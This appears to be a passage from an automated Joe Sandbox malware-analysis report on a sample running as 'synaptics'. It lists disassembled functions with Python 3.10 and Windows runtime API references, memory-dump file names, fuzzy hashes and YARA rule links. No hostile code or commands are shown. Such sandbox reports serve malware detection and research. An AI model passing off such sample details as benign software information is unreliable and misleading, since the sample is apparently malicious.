                                                                                                                                                                                                      • Instruction ID: 1b76807474214e5e01694fa626e36c0b0fc46bd9e3470a1b7b695d93ced29c23
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E517F359042199FEB02CF68C582AEEBBF5FF09214F14449FD992A72A4D773E984CB50
                                                                                                                                                                                                      Function 6C53ACB0 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _finite.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C53ACCE
                                                                                                                                                                                                      • _finite.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C53ACE4
                                                                                                                                                                                                      • _isnan.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C53ACFA
                                                                                                                                                                                                      • frexp.API-MS-WIN-CRT-MATH-L1-1-0(?,?), ref: 6C53AD4B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _finite$_isnanfrexp
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 300003576-0
                                                                                                                                                                                                      • Opcode ID: e0d2efa0b5c5305db396c0ae0bd0275abb44d2f619707f887ae4b1d0a76299f4
                                                                                                                                                                                                      • Instruction ID: bfe2245399195d45b5d1194b32b11f01624f4c8592ac5558943769e937cbd481
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0d2efa0b5c5305db396c0ae0bd0275abb44d2f619707f887ae4b1d0a76299f4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F41E532A14A184ACB069E3C9C1115AB7A9AFC73B1F05872DED79FB6C0FB30D5598681
                                                                                                                                                                                                      Function 6C588900 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C58893D
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: memset.VCRUNTIME140()qXl,00000000,00000168,?,?), ref: 6C58DD44
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE5D
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE77
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: GetCurrentThreadId.KERNEL32 ref: 6C58DE97
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310 ref: 6C58DEA0
                                                                                                                                                                                                      • PyPreConfig_InitIsolatedConfig.PYTHON310(?), ref: 6C58899C
                                                                                                                                                                                                      • PyPreConfig_InitPythonConfig.PYTHON310(?), ref: 6C5889AF
                                                                                                                                                                                                      • _Py_PreInitializeFromPyArgv.PYTHON310(?,?,?), ref: 6C588A7A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InitThread_allocate_lock$ConfigConfig_$ArgvCurrentFromInitializeIsolatedPythonRuntimeState_Threadmemset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1399979553-0
                                                                                                                                                                                                      • Opcode ID: 7d5ca1f01c1406c9a4a667721e63baceb18a7a5d3b165b097ec060e06cd4e2ce
                                                                                                                                                                                                      • Instruction ID: 713b4cfddb892b207ed19a6098c2a366211708b18fdc0eb1fe6b33935268c839
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d5ca1f01c1406c9a4a667721e63baceb18a7a5d3b165b097ec060e06cd4e2ce
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B14123715093549FD310CF68C944B5AB7F4FB85328F448A2EF4A587A90E775E948CB82
                                                                                                                                                                                                      Function 6C568F10 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000068,00000000), ref: 6C568F2E
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C568F8E
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C568FC1
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C568FF4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3912115370-0
                                                                                                                                                                                                      • Opcode ID: e451d4b7ed406887ee874052dfa10431cc4a0ef278ff9bfa7e2f36ad0f9c72f5
                                                                                                                                                                                                      • Instruction ID: 136cc96c26374abd7a70728497cdb6068052a7ab983a41783319d17bc4df500d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e451d4b7ed406887ee874052dfa10431cc4a0ef278ff9bfa7e2f36ad0f9c72f5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1419CB1A00B069FD318DF29C941B56BBE4FF88714F01462EE989A7B90E774E814CB85
                                                                                                                                                                                                      Function 73A8446A Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualQuery.KERNEL32(83000000,BD973097,0000001C,BD973097,?,?,?), ref: 73A84386
                                                                                                                                                                                                      • __FindPESection.LIBCMT ref: 73A843C3
                                                                                                                                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 73A843E3
                                                                                                                                                                                                      • __FindPESection.LIBCMT ref: 73A843FD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1876002356-0
                                                                                                                                                                                                      • Opcode ID: 81b5a198780d2ae33065ff3f79719918895cc55abfcab61b496996566f8af2b4
                                                                                                                                                                                                      • Instruction ID: 18160be248c1ee32ed64379866e05e62559c72212dc9d852f24c49ed5e076cc5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b5a198780d2ae33065ff3f79719918895cc55abfcab61b496996566f8af2b4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04319276A013258FEB06CF99AA427DD77B9EB0C354F14007AD906F7299EB31DC118BA1
                                                                                                                                                                                                      Function 6C585B30 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Py_DecodeLocale.PYTHON310(?,?,?,?,?,6C57E9B6,?,?,?,?,?), ref: 6C585B8F
                                                                                                                                                                                                      • _PyWideStringList_Clear.PYTHON310(6C57E9B6,?,?,?,6C57E9B6,?,?,?,?,?), ref: 6C585BB2
                                                                                                                                                                                                      • _PyWideStringList_Clear.PYTHON310(?,?,?,?,?,?,6C57E9B6,?,?,?,?,?), ref: 6C585BCD
                                                                                                                                                                                                      • _PyWideStringList_Copy.PYTHON310(6C57E9B6,?,?,?,?,?,6C57E9B6,?,?,?,?,?), ref: 6C585C4C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_StringWide$Clear$CopyDecodeLocale
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2653630733-0
                                                                                                                                                                                                      • Opcode ID: 4bce14246d4cd31a570ea2e72c70a157034b312bbada8bf09f442f4285982bd1
                                                                                                                                                                                                      • Instruction ID: 4ef3773671c30a3d584b93a0fde23eae55c93ca060a7f5943428057f4f0a14e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bce14246d4cd31a570ea2e72c70a157034b312bbada8bf09f442f4285982bd1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97419AB16053158FDB00CF09D841B8ABBE4FF85329F40896AE8998B621D331D959CFE2
                                                                                                                                                                                                      Function 6C451E80 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 28cd1d8a46595f2e94ab5148edde2f57cd3ef9bc986906651069b9dc40fd2810
                                                                                                                                                                                                      • Instruction ID: 41ed9df5c8141adcbc331ab9ebade1909fda899f17ed200a862667998996cbd1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28cd1d8a46595f2e94ab5148edde2f57cd3ef9bc986906651069b9dc40fd2810
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B31F872A015059BD710CEA9D8C0E8A73F4AF40339F544365E928CBB91D736ED62CBD1
                                                                                                                                                                                                      Function 6C4EAB80 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?), ref: 6C4EAB97
                                                                                                                                                                                                        • Part of subcall function 6C4D1F70: _PyErr_NoMemory.PYTHON310(00000000,?,?,?), ref: 6C4D1FF2
                                                                                                                                                                                                      • _PyUnicodeWriter_WriteStr.PYTHON310(?,?), ref: 6C4EABC0
                                                                                                                                                                                                      • _PyUnicode_FindMaxChar.PYTHON310(?,?,?), ref: 6C4EAC08
                                                                                                                                                                                                      • _PyUnicodeWriter_PrepareInternal.PYTHON310(?,?,?), ref: 6C4EAC31
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: UnicodeUnicode_Writer_$CharErr_FindInternalMemoryPrepareReadyWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 290328684-0
                                                                                                                                                                                                      • Opcode ID: 7fcf0b7668fccdc22b098636ee39c680190ff212408079cf43a04e24fcfd27f9
                                                                                                                                                                                                      • Instruction ID: 222c927f4ed9bc91e63bad13bc9502d8fe85bb3071e6a4b80360258d4f12a8f2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fcf0b7668fccdc22b098636ee39c680190ff212408079cf43a04e24fcfd27f9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5213B72A042056FDB14DE28EC80D6A7F79EF8577EB164729FD2997B84D320F81182E0
                                                                                                                                                                                                      Function 6C498BE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 3806e0a662f93309f861ae75ccefed8a80b6c2daceb6e9457ca8b4fd1cba4898
                                                                                                                                                                                                      • Instruction ID: dc814a27e0c8ba31b5cd3c109fc7731dd208510ad1a21046db38e5bf040fdd8e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3806e0a662f93309f861ae75ccefed8a80b6c2daceb6e9457ca8b4fd1cba4898
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A31A2B19053208FD710CF29C480E4ABFF5AB89329F14CA2EE969C7760E331D845CB92
                                                                                                                                                                                                      Function 6C58DB40 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6C58DB5E
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C58DBAA
                                                                                                                                                                                                      • __alldvrm.LIBCMT ref: 6C58DBC6
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C58DBEC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterFrequencyUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 15951272-0
                                                                                                                                                                                                      • Opcode ID: 1ca6fcc289c40129e1e3a55af4f4542df51cccb6dc5949aa663574b543e34b0e
                                                                                                                                                                                                      • Instruction ID: b38d2252a429aa948b5fda37cd6e96ce1e49f905b37c43e6955c32724ec999bd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ca6fcc289c40129e1e3a55af4f4542df51cccb6dc5949aa663574b543e34b0e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3210A327052699BEF10DE99CC84A5777F9FBC62A5F10466EF54493700D734D8409B61
                                                                                                                                                                                                      Function 73A82BC0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 73A82BCE
                                                                                                                                                                                                      • _global_unwind2.VCRUNTIME140(?), ref: 73A82C35
                                                                                                                                                                                                      • _local_unwind2.VCRUNTIME140(?,?), ref: 73A82C42
                                                                                                                                                                                                      • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 73A82C80
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _local_unwind2$___except_validate_context_record_global_unwind2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2485504424-0
                                                                                                                                                                                                      • Opcode ID: c3ff007ec7ebba18a3ae6eebd811874a1e1ab1a2f2d1c2a2c79ae56f53df1fc5
                                                                                                                                                                                                      • Instruction ID: c00205e7058613661970e9143382671f1e9bd8ccc2f0b8f4daa8cc9a21d61dc8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3ff007ec7ebba18a3ae6eebd811874a1e1ab1a2f2d1c2a2c79ae56f53df1fc5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE217475500308ABDB01DF18D985AF6BBA8FF04360F44416AED165B399D731F964CBE0
                                                                                                                                                                                                      Function 6C4A5B80 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
